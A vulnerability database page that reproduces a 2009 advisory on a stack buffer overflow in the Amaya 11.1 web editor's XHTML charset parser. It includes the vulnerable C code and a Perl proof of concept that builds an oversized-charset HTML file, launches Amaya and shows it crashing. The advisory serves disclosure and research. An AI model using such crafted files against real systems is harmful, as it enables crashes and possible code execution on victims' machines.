Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Amaya 11.1 XHTML Parser Remote Buffer Overflow PoC

🗓️ 06 Apr 2009 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 8 Views

Amaya 11.1 XHTML Parser Buffer Overflo

Code

                                                #=cicatriz <[email protected]>=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#
				     /)           /)     /)                   
			_ _  _______(/ ________  // _   (/_ _       _____  _  
			(/__(_)(_)(_(_(_)(_)    (/_(_(_/_) /_)_ o  (_)/ (_(_/_
						                         .-/  
#=Amaya 11.1 XHTML Parser Buffer Overflow=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~(_/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Advisory & Vulnerability Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

	Title: Amaya 11.1 XHTML Parser Buffer Overflow
	Advisory ID: VUDO-2009-0104
	Advisory URL: http://research.voodoo-labs.org/advisories/2
	Date founded: 2009-03-30
	Vendors contacted: N/A
	Class: Buffer Overflow
	Remotely Exploitable: Yes
	Locally Exploitable: Yes
	Exploit/PoC Available: Yes

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Tested & Vulnerable packages=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

	[+] Amaya 11.1
	[+] Amaya 11
	
	Non tested but possible:
	[*] Amaya 10
	
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Solutions and Workarounds=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Amaya is planning to release a newer version (11.2 snapshot) [1]

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Technical Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

A stack buffer overflow have been discovered in the Amaya [1] Web Editor's XHTML parser function:
ParseCharsetAndContentType(), wich can be used to compromise the victim's system via arbitrary code execution.
 
The overflow occurs when the application process the "charset" type from a crafted HTML page.If the charset
has a large amount of chars can lead to a stack buffer overflow and, maybe, be exploited using printable ASCII
characters. When the application was debugged, it showed that the overflow occurs in the function 
"ParseCharsetAndContentType":

+++Amaya/amaya/XHTMLbuilder.c

    68	void ParseCharsetAndContentType (Element el, Document doc) 
    69	
    70	{
    71	  AttributeType attrType;
    72	  Attribute     attr;
    73	  ElementType   elType;
    74	  CHARSET       charset;
    75	  char         *text, *text2, *ptrText, *str; XXX
    76	  char          charsetname[MAX_LENGTH]; 
    77	  int           length;
    78	  int           pos, index = 0;
    79	
	...
   125	
   126	                      if (charset == UNDEFINED_CHARSET)
   127	                        {
   128	                          /* the charset is not already defined by the http header */
   129	                          str = strstr (text2, "charset=");
   130	                          if (str)
   131	                            {
   132	                              pos = str - text2 + 8;
   133	                              while (text2[pos] != SPACE &&
   134	                                     text2[pos] != TAB && text2[pos] != EOS)
   135	                                charsetname[index++] = text2[pos++]; XXX
   136	                              charsetname[index] = EOS;
   137	                              charset = TtaGetCharset (charsetname);
   138	                              if (charset != UNDEFINED_CHARSET)
   139	                                TtaSetDocumentCharset (doc, charset, FALSE);
   140	                            }
   141	                        }
   142	                      TtaFreeMemory (text2);
   143	                    }       
   144	                } 
   145	            }
   146	          TtaFreeMemory (text);
   147	        }
   148	    }

---Amaya/amaya/XHTMLbuilder.c

So, the application creates a buffer called "charsetname" with a length of 1024 bytes and then tries to fill
it with the charset type name, skipping the 8 bytes of "charset=", without making any type of length check.
If an HTML page has something like this it might produce the overflow:

+++
<meta http-equiv="Content-Type" content="text/html; charset="AAAAAAAAAAAAAAAAAAAAAAAA...x1922" />
---

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Proof of Concept=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

The following perl script creates an HTML file that reproduces the overflow:

+++amaya_poc.pl

#!/usr/bin/perl -w

# [*] Amaya 11.1 XHTML Parser Buffer Overflow POC
# [*] C1c4Tr1Z <[email protected]>
## Copyright (c) 2008-2009 Voodoo Research Group.

my $filename="b0f.html";
my $b0f="x41"x1922;
my $vulnerable=qq{
<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset={b0f}">
</head>

<body>
</body>
</html>
};
#debug: "gdb -q --args "/usr/lib/Amaya/wx/bin/amaya_bin" ./$filename"
my $exec="/usr/lib/Amaya/wx/bin/amaya_bin ./$filename";

open(HTML, "> $filename") || die "[-] Error ($!). Exiting..n";
$vulnerable=~s|({b0f})+|$b0f|g;
print HTML $vulnerable;
close(HTML);

print "[+] File $filename created.n";
print "[+] Setting enviroment variables..n";

$ENV{'XLIB_SKIP_ARGB_VISUALS'}=1;
$ENV{'G_SLICE'}="always-malloc";

print "[+] Executing amayan";
sleep(3);
exec("clear; $exec");

---amaya_poc.pl

+++console
 $ perl amaya.pl
[+] File b0f.html created.
[+] Setting enviroment variables..
[+] Executing amaya

* Amaya: Error Irrecuperable ***Segmentation fault
 $ 
---

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Reporting Timeline=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

	[*] 30-03-2009: Bug discovered.
	[*] 01-04-2009: Advisory VUDO-2009-3003 published without notifying the vendor.

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=References=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

	[1] Amaya Project Homepage: http://www.w3.org/Amaya/

#=cicatriz <[email protected]>=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#
#=mié 01 abr 2009 ART=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Apr 2009 00:00Current
7.1High risk
Vulners AI Score7.1
amaya 11.1xhtml parserbuffer overflowremoteexploitableadvisoryvulnerabilitystackcode executionasciicharsetdocumentexploitsnapshotsolutionworkaround
8